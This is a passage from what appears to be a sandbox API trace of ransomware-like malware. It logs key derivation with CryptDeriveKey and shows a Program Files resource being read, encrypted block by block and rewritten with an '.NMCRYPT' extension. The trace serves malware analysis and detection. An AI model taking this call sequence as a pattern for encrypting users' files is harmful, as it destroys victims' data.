(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.156] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.157] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0159.157] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.157] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad3b8) returned 1 [0159.157] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.157] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.157] wcslen (_String="\\\\?\\") returned 0x4 [0159.157] CryptDuplicateKey (in: hKey=0x9ad3b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad538) returned 1 [0159.157] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.158] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.158] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0159.158] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.159] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.160] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.160] GetLastError () returned 0x0 [0159.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.162] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.162] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.162] GetLastError () returned 0x0 [0159.162] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.162] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.162] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.162] GetLastError () returned 0x0 [0159.162] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.162] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.162] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.162] GetLastError () returned 0x0 [0159.162] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.162] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.162] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.162] GetLastError () returned 0x0 [0159.162] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.162] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.162] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.162] GetLastError () returned 0x0 [0159.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.163] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.163] GetLastError () returned 0x0 [0159.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.163] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.163] GetLastError () returned 0x0 [0159.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.163] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.163] GetLastError () returned 0x0 [0159.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.163] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.163] GetLastError () returned 0x0 [0159.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.163] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.163] GetLastError () returned 0x0 [0159.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.163] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.163] GetLastError () returned 0x0 [0159.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.164] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.164] GetLastError () returned 0x0 [0159.164] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.164] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.164] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.164] GetLastError () returned 0x0 [0159.164] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.164] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.164] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.164] GetLastError () returned 0x0 [0159.164] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.164] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.164] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.164] GetLastError () returned 0x0 [0159.164] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.164] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.164] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.164] GetLastError () returned 0x0 [0159.164] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.164] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.164] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.164] GetLastError () returned 0x0 [0159.164] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.164] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.165] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.165] GetLastError () returned 0x0 [0159.165] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.165] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.165] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.165] GetLastError () returned 0x0 [0159.165] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.165] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.165] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.165] GetLastError () returned 0x0 [0159.165] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.165] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.165] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.165] GetLastError () returned 0x0 [0159.165] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.165] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.165] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.165] GetLastError () returned 0x0 [0159.165] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.165] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.165] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.165] GetLastError () returned 0x0 [0159.165] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.165] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.165] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.165] GetLastError () returned 0x0 [0159.165] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.166] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, 